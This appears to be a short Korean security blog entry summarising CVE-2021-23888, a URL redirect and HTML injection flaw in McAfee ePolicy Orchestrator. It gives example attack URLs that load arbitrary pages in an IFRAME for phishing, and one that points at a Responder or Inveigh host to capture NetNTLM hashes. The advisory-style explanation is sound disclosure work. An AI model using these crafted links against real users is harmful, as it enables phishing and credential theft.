[하루한줄] CVE-2021-23888: McAfee ePolicy Orchestrator HTML Injection

URL

CVE-2021-23888 - McAfee ePolicy Orchestrator HTML Injection

Target

  • McAfee ePolicy Orchestrator

Explain

McAfee ePolicy Orchestrator 5.10 Update 10 이전 버전에서 검증되지 않은 client 측 URL redirect 취약점이 발견되었습니다. 이 취약점을 통해 인증된 ePO 사용자는 신뢰되지 않은 ePO IFRAME을 로드하여 인증된 사용자의 정보를 도용할 수 있습니다.

https://epo-host:8443/core/orionNavigationLogin.do#/core/orionDefaultPage.do

위의 주소로 접근을 하게 되면 /core/orionDefaultPage.do가 IFRAME 내부에서 참조되는 것을 확인할 수 있습니다.

여러 시도를 통해 https://epo-host:8443/core/orionNavigationLogin.do#//google.com google search page를 IFRAME에서 로드하는 것을 확인할 수 있습니다.

공격자는 # 뒤의 domain/URL을 바꾸어 victim에게 보내 피싱 공격을 할 수 있습니다.

또한, host에서 실행되는 Responder-or-Inveigh를 가리키게 해 ePO 사용자의 NetNTM 해시를 얻을 수 있습니다.

https://epo-host:8443/core/orionNavigationLogin.do#//host-running-responder-or-inveigh